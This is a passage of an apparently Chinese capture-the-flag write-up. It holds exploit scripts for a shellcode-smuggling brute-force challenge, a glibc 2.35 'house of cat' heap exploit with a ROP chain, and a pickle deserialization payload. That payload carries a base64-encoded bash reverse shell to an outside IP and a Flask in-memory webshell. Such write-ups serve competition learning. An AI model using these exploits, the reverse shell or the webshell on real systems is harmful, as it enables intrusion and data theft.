void newweapon120(int num) {weaponlist[0]=0;} void newweapon121(int num) {weaponlist[0]=0;} void newweapon122(int num) {weaponlist[0]=0;} void newweapon123(int num) {weaponlist[0]=0;} void newweapon124(int num) {weaponlist[0]=0;} void newweapon125(int num) {weaponlist[0]=0;} void newweapon126(int num) {weaponlist[0]=0;} void newweapon127(int num) {weaponlist[0]=0;} void newweapon128(int num) {weaponlist[0]=0;} void newweapon129(int num) {weaponlist[0]=0;} void newweapon130(int num) {weaponlist[0]=0;} void newweapon131(int num) {weaponlist[0]=0;} void newweapon132(int num) {weaponlist[0]=0;} void newweapon133(int num) {weaponlist[0]=0;} void newweapon134(int num) {weaponlist[0]=0;} void newweapon135(int num) {weaponlist[0]=0;} void newweapon136(int num) {weaponlist[0]=0;} void newweapon137(int num) {weaponlist[0]=0;} void newweapon138(int num) {weaponlist[0]=0;} void newweapon139(int num) {weaponlist[0]=0;}
void newweapon140(int num) {weaponlist[0]=0;} void newweapon141(int num) {weaponlist[0]=0;} void newweapon142(int num) {weaponlist[0]=0;} void newweapon143(int num) {weaponlist[0]=0;} void newweapon144(int num) {weaponlist[0]=0;} void newweapon145(int num) {weaponlist[0]=0;} void newweapon146(int num) {weaponlist[0]=0;} void newweapon147(int num) {weaponlist[0]=0;} void newweapon148(int num) {weaponlist[0]=0;} void newweapon149(int num) {weaponlist[0]=0;} void newweapon150(int num) {weaponlist[0]=0;} void newweapon151(int num) {weaponlist[0]=0;} void newweapon152(int num) {weaponlist[0]=0;} void newweapon153(int num) {weaponlist[0]=0;} void newweapon154(int num) {weaponlist[0]=0;} void newweapon155(int num) {weaponlist[0]=0;} void newweapon156(int num) {weaponlist[0]=0;} void newweapon157(int num) {weaponlist[0]=0;} void newweapon158(int num) {weaponlist[0]=0;} void newweapon159(int num) {weaponlist[0]=0;}
void newweapon160(int num) {weaponlist[0]=0;} void newweapon161(int num) {weaponlist[0]=0;} void newweapon162(int num) {weaponlist[0]=0;} void newweapon163(int num) {weaponlist[0]=0;} void newweapon164(int num) {weaponlist[0]=0;} void newweapon165(int num) {weaponlist[0]=0;} void newweapon166(int num) {weaponlist[0]=0;} void newweapon167(int num) {weaponlist[0]=0;} void newweapon168(int num) {weaponlist[0]=0;} void newweapon169(int num) {weaponlist[0]=0;} void newweapon170(int num) {weaponlist[0]=0;} void newweapon171(int num) {weaponlist[0]=0;} void newweapon172(int num) {weaponlist[0]=0;} void newweapon173(int num) {weaponlist[0]=0;} void newweapon174(int num) {weaponlist[0]=0;} void newweapon175(int num) {weaponlist[0]=0;} void newweapon176(int num) {weaponlist[0]=0;} void newweapon177(int num) {weaponlist[0]=0;} void newweapon178(int num) {weaponlist[0]=0;} void newweapon179(int num) {weaponlist[0]=0;}
void newweapon180(int num) {weaponlist[0]=0;} void newweapon181(int num) {weaponlist[0]=0;} void newweapon182(int num) {weaponlist[0]=0;} void newweapon183(int num) {weaponlist[0]=0;} void newweapon184(int num) {weaponlist[0]=0;} void newweapon185(int num) {weaponlist[0]=0;} void newweapon186(int num) {weaponlist[0]=0;} void newweapon187(int num) {weaponlist[0]=0;} void newweapon188(int num) {weaponlist[0]=0;} void newweapon189(int num) {weaponlist[0]=0;} void newweapon190(int num) {weaponlist[0]=0;} void newweapon191(int num) {weaponlist[0]=0;} void newweapon192(int num) {weaponlist[0]=0;} void newweapon193(int num) {weaponlist[0]=0;} void newweapon194(int num) {weaponlist[0]=0;} void newweapon195(int num) {weaponlist[0]=0;} void newweapon196(int num) {weaponlist[0]=0;} void newweapon197(int num) {weaponlist[0]=0;} void newweapon198(int num) {weaponlist[0]=0;} void newweapon199(int num) {weaponlist[0]=0;}
void newweapon200(int num) {weaponlist[0]=0;} void newweapon201(int num) {weaponlist[0]=0;} void newweapon202(int num) {weaponlist[0]=0;} void newweapon203(int num) {weaponlist[0]=0;} void newweapon204(int num) {weaponlist[0]=0;} void newweapon205(int num) {weaponlist[0]=0;} void newweapon206(int num) {weaponlist[0]=0;} void newweapon207(int num) {weaponlist[0]=0;} void newweapon208(int num) {weaponlist[0]=0;} void newweapon209(int num) {weaponlist[0]=0;} void newweapon210(int num) {weaponlist[0]=0;} void newweapon211(int num) {weaponlist[0]=0;} void newweapon212(int num) {weaponlist[0]=0;} void newweapon213(int num) {weaponlist[0]=0;} void newweapon214(int num) {weaponlist[0]=0;} void newweapon215(int num) {weaponlist[0]=0;} void newweapon216(int num) {weaponlist[0]=0;} void newweapon217(int num) {weaponlist[0]=0;} void newweapon218(int num) {weaponlist[0]=0;} void newweapon219(int num) {weaponlist[0]=0;}
void newweapon220(int num) {weaponlist[0]=0;} void newweapon221(int num) {weaponlist[0]=0;} void newweapon222(int num) {weaponlist[0]=0;} void newweapon223(int num) {weaponlist[0]=0;} void newweapon224(int num) {weaponlist[0]=0;} void newweapon225(int num) {weaponlist[0]=0;} void newweapon226(int num) {weaponlist[0]=0;} void newweapon227(int num) {weaponlist[0]=0;} void newweapon228(int num) {weaponlist[0]=0;} void newweapon229(int num) {weaponlist[0]=0;} void newweapon230(int num) {weaponlist[0]=0;} void newweapon231(int num) {weaponlist[0]=0;} void newweapon232(int num) {weaponlist[0]=0;} void newweapon233(int num) {weaponlist[0]=0;} void newweapon234(int num) {weaponlist[0]=0;} void newweapon235(int num) {weaponlist[0]=0;} void newweapon236(int num) {weaponlist[0]=0;} void newweapon237(int num) {weaponlist[0]=0;} void newweapon238(int num) {weaponlist[0]=0;} void newweapon239(int num) {weaponlist[0]=0;}
void newweapon240(int num) {weaponlist[0]=0;} void newweapon241(int num) {weaponlist[0]=0;} void newweapon242(int num) {weaponlist[0]=0;} void newweapon243(int num) {weaponlist[0]=0;} void newweapon244(int num) {weaponlist[0]=0;} void newweapon245(int num) {weaponlist[0]=0;} void newweapon246(int num) {weaponlist[0]=0;} void newweapon247(int num) {weaponlist[0]=0;} void newweapon248(int num) {weaponlist[0]=0;} void newweapon249(int num) {weaponlist[0]=0;} void newweapon250(int num) {weaponlist[0]=0;} void newweapon251(int num) {weaponlist[0]=0;} void newweapon252(int num) {weaponlist[0]=0;} void newweapon253(int num) {weaponlist[0]=0;} void newweapon254(int num) {weaponlist[0]=0;} void newweapon255(int num) {weaponlist[0]=0;} void newweapon256(int num) {weaponlist[0]=0;} void newweapon257(int num) {weaponlist[0]=0;} void newweapon258(int num) {weaponlist[0]=0;} void newweapon259(int num) {weaponlist[0]=0;}
void newweapon260(int num) {weaponlist[0]=0;} void newweapon261(int num) {weaponlist[0]=0;} void newweapon262(int num) {weaponlist[0]=0;} void newweapon263(int num) {weaponlist[0]=0;} void newweapon264(int num) {weaponlist[0]=0;} void newweapon265(int num) {weaponlist[0]=0;} void newweapon266(int num) {weaponlist[0]=0;} void newweapon267(int num) {weaponlist[0]=0;} void newweapon268(int num) {weaponlist[0]=0;} void newweapon269(int num) {weaponlist[0]=0;} void newweapon270(int num) {weaponlist[0]=0;} void newweapon271(int num) {weaponlist[0]=0;} void newweapon272(int num) {weaponlist[0]=0;} void newweapon273(int num) {weaponlist[0]=0;} void newweapon274(int num) {weaponlist[0]=0;} void newweapon275(int num) {weaponlist[0]=0;} void newweapon276(int num) {weaponlist[0]=0;} void newweapon277(int num) {weaponlist[0]=0;} void newweapon278(int num) {weaponlist[0]=0;} void newweapon279(int num) {weaponlist[0]=0;}
void newweapon280(int num) {weaponlist[0]=0;} void newweapon281(int num) {weaponlist[0]=0;} void newweapon282(int num) {weaponlist[0]=0;} void newweapon283(int num) {weaponlist[0]=0;} void newweapon284(int num) {weaponlist[0]=0;} void newweapon285(int num) {weaponlist[0]=0;} void newweapon286(int num) {weaponlist[0]=0;} void newweapon287(int num) {weaponlist[0]=0;} void newweapon288(int num) {weaponlist[0]=0;} void newweapon289(int num) {weaponlist[0]=0;} void newweapon290(int num) {weaponlist[0]=0;} void newweapon291(int num) {weaponlist[0]=0;} void newweapon292(int num) {weaponlist[0]=0;} void newweapon293(int num) {weaponlist[0]=0;} void newweapon294(int num) {weaponlist[0]=0;} void newweapon295(int num) {weaponlist[0]=0;} void newweapon296(int num) {weaponlist[0]=0;} void newweapon297(int num) {weaponlist[0]=0;} void newweapon298(int num) {weaponlist[0]=0;} void newweapon299(int num) {weaponlist[0]=0;}
void newweapon300(int num) {weaponlist[0]=0;} void newweapon301(int num) {weaponlist[0]=0;} void newweapon302(int num) {weaponlist[0]=0;} void newweapon303(int num) {weaponlist[0]=0;} void newweapon304(int num) {weaponlist[0]=0;} void newweapon305(int num) {weaponlist[0]=0;} void newweapon306(int num) {weaponlist[0]=0;} void newweapon307(int num) {weaponlist[0]=0;} void newweapon308(int num) {weaponlist[0]=0;} void newweapon309(int num) {weaponlist[0]=0;} void newweapon310(int num) {weaponlist[0]=0;} void newweapon311(int num) {weaponlist[0]=0;} void newweapon312(int num) {weaponlist[0]=0;} void newweapon313(int num) {weaponlist[0]=0;} void newweapon314(int num) {weaponlist[0]=0;} void newweapon315(int num) {weaponlist[0]=0;} void newweapon316(int num) {weaponlist[0]=0;} void newweapon317(int num) {weaponlist[0]=0;} void newweapon318(int num) {weaponlist[0]=0;} void newweapon319(int num) {weaponlist[0]=0;}
void newweapon320(int num) {weaponlist[0]=0;} void newweapon321(int num) {weaponlist[0]=0;} void newweapon322(int num) {weaponlist[0]=0;} void newweapon323(int num) {weaponlist[0]=0;} void newweapon324(int num) {weaponlist[0]=0;} void newweapon325(int num) {weaponlist[0]=0;} void newweapon326(int num) {weaponlist[0]=0;} void newweapon327(int num) {weaponlist[0]=0;} void newweapon328(int num) {weaponlist[0]=0;} void newweapon329(int num) {weaponlist[0]=0;} void newweapon330(int num) {weaponlist[0]=0;} void newweapon331(int num) {weaponlist[0]=0;} void newweapon332(int num) {weaponlist[0]=0;} void newweapon333(int num) {weaponlist[0]=0;} void newweapon334(int num) {weaponlist[0]=0;} void newweapon335(int num) {weaponlist[0]=0;} void newweapon336(int num) {weaponlist[0]=0;} void newweapon337(int num) {weaponlist[0]=0;} void newweapon338(int num) {weaponlist[0]=0;} void newweapon339(int num) {weaponlist[0]=0;}
void newweapon340(int num) {weaponlist[0]=0;} void newweapon341(int num) {weaponlist[0]=0;} void newweapon342(int num) {weaponlist[0]=0;} void newweapon343(int num) {weaponlist[0]=0;} void newweapon344(int num) {weaponlist[0]=0;} void newweapon345(int num) {weaponlist[0]=0;} void newweapon346(int num) {weaponlist[0]=0;} void newweapon347(int num) {weaponlist[0]=0;} void newweapon348(int num) {weaponlist[0]=0;} void newweapon349(int num) {weaponlist[0]=0;} void newweapon350(int num) {weaponlist[0]=0;} void newweapon351(int num) {weaponlist[0]=0;} void newweapon352(int num) {weaponlist[0]=0;} void newweapon353(int num) {weaponlist[0]=0;} void newweapon354(int num) {weaponlist[0]=0;} void newweapon355(int num) {weaponlist[0]=0;} void newweapon356(int num) {weaponlist[0]=0;} void newweapon357(int num) {weaponlist[0]=0;} void newweapon358(int num) {weaponlist[0]=0;} void newweapon359(int num) {weaponlist[0]=0;}
void newweapon360(int num) {weaponlist[0]=0;} void newweapon361(int num) {weaponlist[0]=0;} void newweapon362(int num) {weaponlist[0]=0;} void newweapon363(int num) {weaponlist[0]=0;} void newweapon364(int num) {weaponlist[0]=0;} void newweapon365(int num) {weaponlist[0]=0;} void newweapon366(int num) {weaponlist[0]=0;} void newweapon367(int num) {weaponlist[0]=0;} void newweapon368(int num) {weaponlist[0]=0;} void newweapon369(int num) {weaponlist[0]=0;} void newweapon370(int num) {weaponlist[0]=0;} void newweapon371(int num) {weaponlist[0]=0;} void newweapon372(int num) {weaponlist[0]=0;} void newweapon373(int num) {weaponlist[0]=0;} void newweapon374(int num) {weaponlist[0]=0;} void newweapon375(int num) {weaponlist[0]=0;} void newweapon376(int num) {weaponlist[0]=0;} void newweapon377(int num) {weaponlist[0]=0;} void newweapon378(int num) {weaponlist[0]=0;} void newweapon379(int num) {weaponlist[0]=0;}
void newweapon380(int num) {weaponlist[0]=0;} void newweapon381(int num) {weaponlist[0]=0;} void newweapon382(int num) {weaponlist[0]=0;} void newweapon383(int num) {weaponlist[0]=0;} void newweapon384(int num) {weaponlist[0]=0;} void newweapon385(int num) {weaponlist[0]=0;} void newweapon386(int num) {weaponlist[0]=0;} void newweapon387(int num) {weaponlist[0]=0;} void newweapon388(int num) {weaponlist[0]=0;} void newweapon389(int num) {weaponlist[0]=0;} void newweapon390(int num) {weaponlist[0]=0;} void newweapon391(int num) {weaponlist[0]=0;} void newweapon392(int num) {weaponlist[0]=0;} void newweapon393(int num) {weaponlist[0]=0;} void newweapon394(int num) {weaponlist[0]=0;} void newweapon395(int num) {weaponlist[0]=0;} void newweapon396(int num) {weaponlist[0]=0;} void newweapon397(int num) {weaponlist[0]=0;} void newweapon398(int num) {weaponlist[0]=0;} void newweapon399(int num) {weaponlist[0]=0;}
void gamestart(){
newweapon0(115); newweapon1(115); newweapon2(115); newweapon3(115); newweapon4(115); newweapon5(115); newweapon6(115); newweapon7(115); newweapon8(115); newweapon9(115); newweapon10(115); newweapon11(115); newweapon12(115); newweapon13(115); newweapon14(115); newweapon15(115); newweapon16(115); newweapon17(115); newweapon18(115); newweapon19(115);
newweapon20(115); newweapon21(115); newweapon22(115); newweapon23(115); newweapon24(115); newweapon25(115); newweapon26(115); newweapon27(115); newweapon28(115); newweapon29(115); newweapon30(115); newweapon31(0); //446972 newweapon32(0); newweapon33(115); newweapon34(115); newweapon35(115); newweapon36(115); newweapon37(115); newweapon38(115); newweapon39(115);
newweapon40(115); newweapon41(115); newweapon42(115); newweapon43(115); newweapon44(115); newweapon45(115); newweapon46(115); newweapon47(115); newweapon48(115); newweapon49(115); newweapon50(115); newweapon51(115); newweapon52(115); newweapon53(115); newweapon54(115); newweapon55(115); newweapon56(115); newweapon57(115); newweapon58(115); newweapon59(115);
newweapon60(115); newweapon61(115); newweapon62(115); newweapon63(115); newweapon64(115); newweapon65(115); newweapon66(115); newweapon67(115); newweapon68(115); newweapon69(115); newweapon70(115); newweapon71(115); newweapon72(115); newweapon73(115); newweapon74(115); newweapon75(115); newweapon76(115); newweapon77(115); newweapon78(115); newweapon79(115);
newweapon80(115); newweapon81(115); newweapon82(115); newweapon83(115); newweapon84(115); newweapon85(115); newweapon86(115); newweapon87(115); newweapon88(115); newweapon89(115); newweapon90(115); newweapon91(115); newweapon92(115); newweapon93(115); newweapon94(115); newweapon95(115); newweapon96(115); newweapon97(115); newweapon98(115); newweapon99(115);
newweapon100(115); newweapon101(115); newweapon102(115); newweapon103(115); newweapon104(115); newweapon105(115); newweapon106(115); newweapon107(115); newweapon108(115); newweapon109(115); newweapon110(115); newweapon111(115); newweapon112(115); newweapon113(115); newweapon114(115); newweapon115(115); newweapon116(115); newweapon117(115); newweapon118(115); newweapon119(115);
newweapon120(115); newweapon121(115); newweapon122(115); newweapon123(115); newweapon124(115); newweapon125(115); newweapon126(115); newweapon127(115); newweapon128(115); newweapon129(115); newweapon130(115); newweapon131(115); newweapon132(115); newweapon133(115); newweapon134(115); newweapon135(115); newweapon136(115); newweapon137(115); newweapon138(115); newweapon139(115);
newweapon140(115); newweapon141(115); newweapon142(115); newweapon143(115); newweapon144(115); newweapon145(115); newweapon146(115); newweapon147(115); newweapon148(115); newweapon149(115); newweapon150(115); newweapon151(115); newweapon152(115); newweapon153(115); newweapon154(115); newweapon155(115); newweapon156(115); newweapon157(115); newweapon158(115); newweapon159(115);
newweapon160(115); newweapon161(115); newweapon162(115); newweapon163(115); newweapon164(115); newweapon165(115); newweapon166(115); newweapon167(115); newweapon168(115); newweapon169(115); newweapon170(115); newweapon171(115); newweapon172(115); newweapon173(115); newweapon174(115); newweapon175(115); newweapon176(115); newweapon177(115); newweapon178(115); newweapon179(115);
newweapon180(115); newweapon181(115); newweapon182(115); newweapon183(115); newweapon184(115); newweapon185(115); newweapon186(115); newweapon187(115); newweapon188(115); newweapon189(115); newweapon190(115); newweapon191(115); newweapon192(115); newweapon193(115); newweapon194(115); newweapon195(115); newweapon196(115); newweapon197(115); newweapon198(115); newweapon199(115);
newweapon200(115); newweapon201(115); newweapon202(115); newweapon203(115); newweapon204(115); newweapon205(115); newweapon206(115); newweapon207(115); newweapon208(115); newweapon209(115); newweapon210(115); newweapon211(115); newweapon212(115); newweapon213(115); newweapon214(115); newweapon215(115); newweapon216(115); newweapon217(115); newweapon218(115); newweapon219(115);
newweapon220(115); newweapon221(115); newweapon222(115); newweapon223(115); newweapon224(115); newweapon225(115); newweapon226(115); newweapon227(115); newweapon228(115); newweapon229(115); newweapon230(115); newweapon231(115); newweapon232(115); newweapon233(115); newweapon234(115); newweapon235(115); newweapon236(115); newweapon237(115); newweapon238(115); newweapon239(115);
newweapon240(115); newweapon241(115); newweapon242(115); newweapon243(115); newweapon244(115); newweapon245(115); newweapon246(115); newweapon247(115); newweapon248(115); newweapon249(115); newweapon250(115); newweapon251(115); newweapon252(115); newweapon253(115); newweapon254(115); newweapon255(115); newweapon256(115); newweapon257(115); newweapon258(115); newweapon259(115);
newweapon260(115); newweapon261(115); newweapon262(115); newweapon263(115); newweapon264(115); newweapon265(115); newweapon266(115); newweapon267(115); newweapon268(115); newweapon269(115); newweapon270(115); newweapon271(115); newweapon272(115); newweapon273(115); newweapon274(115); newweapon275(115); newweapon276(115); newweapon277(115); newweapon278(115); newweapon279(115);
newweapon280(115); newweapon281(115); newweapon282(115); newweapon283(115); newweapon284(115); newweapon285(115); newweapon286(115); newweapon287(115); newweapon288(115); newweapon289(115); newweapon290(115); newweapon291(115); newweapon292(115); newweapon293(115); newweapon294(115); newweapon295(115); newweapon296(115); newweapon297(115); newweapon298(115); newweapon299(115);
newweapon300(115); newweapon301(115); newweapon302(115); newweapon303(115); newweapon304(115); newweapon305(115); newweapon306(115); newweapon307(0x72); newweapon308(0x69); newweapon309(0x44); newweapon310(0); newweapon311(0); newweapon312(0); newweapon313(0); newweapon314(0x00); newweapon315(0xe0); newweapon316(0x77); //7776B0 newweapon317(0); newweapon318(0); newweapon319(0);
newweapon320(0); newweapon321(0); newweapon322(115); newweapon323(115); newweapon324(115); newweapon325(115); newweapon326(115); newweapon327(115); newweapon328(115); newweapon329(115); newweapon330(115); newweapon331(115); newweapon332(115); newweapon333(115); newweapon334(115); newweapon335(115); newweapon336(115); newweapon337(115); newweapon338(115); newweapon339(115);
newweapon340(115); newweapon341(115); newweapon342(115); newweapon343(115); newweapon344(115); newweapon345(115); newweapon346(115); newweapon347(115); newweapon348(115); newweapon349(115); newweapon350(115); newweapon351(115); newweapon352(115); newweapon353(115); newweapon354(115); newweapon355(115); newweapon356(115); newweapon357(115); newweapon358(115); newweapon359(115);
newweapon360(115); newweapon361(115); newweapon362(115); newweapon363(115); newweapon364(115); newweapon365(115); newweapon366(115); newweapon367(115); newweapon368(115); newweapon369(115); newweapon370(115); newweapon371(115); newweapon372(115); newweapon373(115); newweapon374(115); newweapon375(115); newweapon376(115); newweapon377(115); newweapon378(115); newweapon379(115);
newweapon380(115); newweapon381(115); newweapon382(115); newweapon383(115); newweapon384(115); newweapon385(115); newweapon386(115); newweapon387(115); newweapon388(115); newweapon389(115); newweapon390(115); newweapon391(115); newweapon392(115); newweapon393(115); newweapon394(115); newweapon395(115); newweapon396(115); newweapon397(115); newweapon398(115); newweapon399(115);

newweapon307(115);
newweapon308(115);
newweapon309(115);
newweapon31(115);
newweapon310(115);
newweapon311(115);
newweapon312(115);
newweapon313(115);

newweapon314(0x00);
newweapon315(0x00);
newweapon316(0x40);
newweapon317(0x00);
newweapon318(0x00);
newweapon319(0x00);
newweapon32(0x00);
newweapon320(0x00);
upgrade(0x7f);

fight(0);
}
int main ( ) {
int res= fight(0);
return 0;
}

yakacmp

漏洞为当指令格式为mov rx,imm(rx是寄存器,imm是立即数且imm不为0)时会多一段汇编是 push imm,且imm是__int64类型。而push imm加上push本身字节码只需要5字节,这样imm的高4个字节可以是任意的汇编,利用这四个字节完成orw。
write系统调用被禁用所以只能爆破flag。我使用的是cmp比较,若相同则一直跳转到read,利用pwntools设置timeout判断字符是否相同。

# -*- coding: utf-8 -*-
from pwn import *

context.terminal = ['tmux','splitw','-h']
context.arch="amd64"
context.log_level="debug"

import string
def debug(addr=-1,PIE=True):
    if addr == -1:
        gdb.attach(p)
        #gdb.attach(p, "b  *0x23330000\nr\n")
    else:
        if PIE:
            #text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).setvbuflines()[1], 16)
            #gdb.attach(p,'b *{}'.format(hex(text_base+addr)))
            gdb.attach(p,"b *$rebase({})".format(hex(addr)))
        else:
            gdb.attach(p,"b *{}".format(hex(addr))) 

def GO(payload):
    payload = payload.split('\n')
    p.recvuntil("me some code now")
    p.sendline(payload[0])
    for i in range(1,len(payload)):

        # p.sendline(i)
        # p.recvuntil("operation?")
        p.sendlineafter("operation?", payload[i])
        # if payload[i] == "mov r1,r5":
        #   p.sendline(payload[i+1])
        #   i = i+1
    #p.sendlineafter("operation?", "NO")
#p = process("./yakacmp1")

def main(idx, char):
    global p
    p = remote("59.110.212.61", 42542)
    #p=process("./yakacmp1")

    payload = ""
    payload += '''mov r1,{}
'''.format((0x67616c66))
    payload +='''mov r1,r1
mov r1,r1
mov r1,r1
mov r1,r1
mov r1,r1
mov r1,r1
mov r1,r1
mov r1,r1
mov r1,r1
mov r1,r1
mov r1,0\n'''
    #payload += '''add r1,2\n'''  # mov -> 0
    #payload += '''sub r1,r1\n'''
    payload += '''mov r1,{}
'''.format((0x5e006a5f23330002))
    payload += '''mov r2,{}
'''.format((0x50050f5800000002)) # read(3,buf,0x100)
    #payload += '''
    payload += '''mov r2,{}
'''.format((0x5f036a5e23330002))
    payload += "mov r1,0\n"
    payload += '''mov r2,{}
'''.format((0x50050f5a00000100))
    payload += '''mov r1,{}
'''.format((0x595a006a23330002)&(0xffff00ffffffffff)|(idx<<(5*8))) # 00 idx
    #payload += "add r3,r4\n"
    payload += '''mov r1,{}
'''.format((0x118ad10023330002))
    payload += '''mov r1,{}
'''.format((0x5966fa8023330002)&(0xff00ffffffffffff)|(ord(char)<<(6*8))) #66 char
    payload += '''mov r1,{}
'''.format((0x595f407500000000)) #66 char
    payload += '''mov r1,{}
'''.format((0x59050f5800000000)) #66 char
    payload += '''mov r1,{}
'''.format((0x59e2ff5a233300e8)) #66 char
    payload += '''mov r1,{}
'''.format((0x59e2ff5800000000)) #66 char

    #debug(0x1AF0 )
    GO(payload)
    p.sendlineafter("operation?",'NO')

    sleep(1)
    p.send('a')
    p.send('a')

    #print(p.recv())

if __name__ == "__main__":
    # libc = ELF('/lib/x86_64-linux-gnu/libc.so.6',checksec=False)
    # flag = "flag{7"
    # flag = "flag{79274530-bb31-"
    # flag = "flag{79274530-bb31-4d35-8ddf-2210"
    # flag = "flag{79274530-bb31-4d35-8ddf-2210c9b"
    flag = ""
    # for i in range(len(flag)):
    #   print(i,flag[i])
    #   main(i,flag[i])
    for idx in range(0,0x40):
        for char in "0123456789abcdef-_":
            try:
                main(idx, char)
                flag += char
                print(flag)
                #print(flag)
                print("-"*100)
                break
            except:
                p.close()

    print("flag:"+flag) 


house of cat

2.35
add chunk的大小限制在0x418 到0x46f,不能申请到tcache大小的堆
delete后存在uaf,可以直接泄露出libc,劫持stderr,
最后堆布局一下修改top chunk size 触发malloc assert即可

from pwn import *

#p = process('./cat')
p = remote("47.94.166.51",35133)
libc = ELF('./libc.so.6')

#context.log_level = 'debug'
def dbg():
    gdb.attach(p)

def login():
    p.recv()
    payload = "LOGIN | r00t QWBQWXF admin"
    p.send(payload)

def ch(cmd):
    p.sendlineafter('choice:\n',str(cmd))

def add(idx,size,content):
    payload = "CAT | r00t QWBQWXF $\xff\xff\xff\xff "
    p.send(payload)
    ch(1)
    p.sendlineafter('idx:\n',str(idx))
    p.sendlineafter('size:\n',str(size))
    p.sendafter('content:\n',str(content))

def free(idx):
    payload = "CAT | r00t QWBQWXF $\xff\xff\xff\xff "
    p.send(payload)
    ch(2)
    p.sendlineafter('idx:\n',str(idx))

def show(idx):
    payload = "CAT | r00t QWBQWXF $\xff\xff\xff\xff "
    p.send(payload)
    ch(3)
    p.sendlineafter('idx:\n',str(idx))

def edit(idx,content):
    payload = "CAT | r00t QWBQWXF $\xff\xff\xff\xff "
    p.send(payload)
    ch(4)
    p.sendlineafter('idx:\n',str(idx))
    p.sendafter('content:\n',str(content))


login()
add(0,0x428,'\x00'*0x30+'/flag') # p1
add(1,0x418,'B'*0x410) # g1
add(2,0x418,'CCC') # p2
add(3,0x438,'gap') # g2

free(0)
add(4,0x438,'aaa') # p1 goto large
free(2)

show(0)
p.recvuntil('Context:\n')
libc_base = u64(p.recv(8)) -0x21a0d0
p.recv(8)
heap_addr = u64(p.recv(8))
large_bin = libc_base + 0x21a0d0

stderr = libc_base +0x21A860
tls_dtor_list = libc_base - 0x2898 -0x80 

pointer_guard  = libc_base  - 0x2898 + 0x8
#pointer_guard = libc_base + 0x6275e8 + 0x8
target_addr = pointer_guard-0x20
jumps = libc_base +  0x215b80
stdout = libc_base + libc.sym['_IO_2_1_stdout_']
next_chain = stdout
fake_guard = heap_addr + 0x850
pop_rdi = libc_base + 0x2a3e5
pop_rsi = libc_base + 0x02be51
pop_rax_rdx_rbx = libc_base + 0x90528
pop_rax = libc_base + 0xd7b55
syscall = libc_base + 0x91396
mov_rsp_rdx = libc_base + 0x5a170
magic_gadget = libc_base + 0x1675b0 # mov rdx, qword ptr [rdi + 8]; 

log.success('libc_base: '+hex(libc_base))
log.info('jumps: '+hex(jumps))
log.info('heap_addr: '+hex(heap_addr))
log.info('tls addr: '+hex(tls_dtor_list))
log.info('target_addr: '+hex(target_addr))
log.info('pointer addr: '+hex(pointer_guard))
log.info('stderr_addr: '+hex(stderr))

payload = p64(large_bin)*2 + p64(heap_addr) + p64(target_addr) 
edit(0,payload)

add(5,0x448,p64(0)) # p2 goto large

#clear large bin
payload = p64(large_bin)*2 + p64(heap_addr)*2


fake_file = '\x00'*0x30
fake_file += '\x00'*0x28
fake_file += p64(next_chain)  # _chain
fake_file += '\x00'*0x18
fake_file += p64(heap_addr)  # _lock = writable address
fake_file += '\x00'*0x10
fake_file += p64(heap_addr)
fake_file +=  '\x00'*0x18
fake_file += p64(0x10000)
fake_file += p64(heap_addr +  0x1da0)
fake_file += '\x00'*0x8
fake_file += p64( jumps + 0x10)  # vtable
fake_file += p64(heap_addr +  0x1da0) + p64((magic_gadget^fake_guard)<<0x11) # 

rop = p64(pop_rax_rdx_rbx)
rop += p64(heap_addr+0x1da0) 
rop += p64(heap_addr+0x1e00) # fake_rdx
rop += p64(heap_addr+0x1da0) 
rop += p64(mov_rsp_rdx)
rop += p64(mov_rsp_rdx) #
rop += p64(mov_rsp_rdx) #rdx+0x20
rop += p64(mov_rsp_rdx)
rop += p64(0)*4
rop += p64(pop_rax)+p64(3)+p64(pop_rdi)+p64(0)+p64(syscall) #close(0)
rop += p64(pop_rax)+p64(2)+p64(pop_rdi)+p64(heap_addr+0x40)+p64(pop_rsi)+p64(0)+p64(syscall)#open
rop += p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(heap_addr+0x200)+p64(pop_rax_rdx_rbx)+p64(0)+p64(0x30)+p64(0)+p64(syscall)#read
rop += p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(heap_addr+0x200)+p64(pop_rax_rdx_rbx)+p64(1)+p64(0x30)+p64(0)+p64(syscall)#read
rop += p64(pop_rax_rdx_rbx)+p64(231)+p64(0)+p64(0)+p64(pop_rdi)+p64(0)+p64(syscall)
hex(len(rop))

add(6,0x448,'666') # p1 
add(7,0x438,rop ) # g1
add(8,0x438, fake_file ) # p2
add(9,0x438,'999') # g2

free(6)
add(10,0x458,'\x0a\x0a\x0a') # p1 goto large
free(8)

show(6)
p.recvuntil('Context:\n')
large_bin = u64(p.recv(8))
p.recv(8)
heap_addr = u64(p.recv(8))
target_addr = stderr - 0x20

log.info('heap_addr: '+hex(heap_addr))

payload = p64(large_bin)*2 + p64(heap_addr) + p64(target_addr) 
edit(6,payload)

add(11,0x468,'\x0b\x0b\x0b') #p2 goto large  
add(12,0x450,p64(0)+p64(0x21)+'a'*0x10+p64(0)+p64(0x21))

# x/30gx $rebase(0x4060)
free(12)
free(11)
free(10)
add(13,0x468,'k'*0x450+p64(0)+p64(0x481) )
free(11)
add(14,0x468,'aa')
log.info('magic_gadget: '+hex(magic_gadget)) 
#dbg()# b*$rebase(0x0177F) b __vfxprintf b *__malloc_assert+78 b*__vfxprintf+76 b*fflush+192

# trigger malloc_assert
payload = "CAT | r00t QWBQWXF $\xff\xff\xff\xff "
p.send(payload)
ch(1)
p.sendlineafter('idx:\n',str(15))
p.sendlineafter('size:\n',str(0x468))


p.interactive()

web

crash

pickle反序列化
i操作码命令执行->flask sleep -> nginx 504
环境有问题
直接命令执行sleep久了环境会挂
写了个内存马命令执行sleep居然就可以了

import base64
import pickletools
cmd = b'''python -c exec('YmFzaCAtaSAmPiAvZGV2L3RjcC8xNTAuMTU4LjE3Mi4xODIvNzc3NyAwPCYx'.decode('base64'))'''
cmd = b'''sleep 70'''
cmd = b'''app.add_url_rule('/shell123', 'shell123', lambda: __import__('os').popen(request.args.get('cmd', 'whoami')).read())'''
cmd_len = str(hex(len(cmd))).replace("0x",r"\x").encode()
print(cmd_len)
# print(b'\x80\x03c__main__\nadmin\n}(X'+cmd_len + b'\x00\x00\x00'+cmd+b'ios\nsystem\n.')
# payload_byte = (b'\x80\x03c__main__\nadmin\n}(X\x2d\x00\x00\x00'+cmd+b'ios\nsystem\n.')
payload_byte = (b'\x80\x03c__main__\nadmin\n}(X\x30\x00\x00\x00'+cmd+b'ios\nsystem\n.')
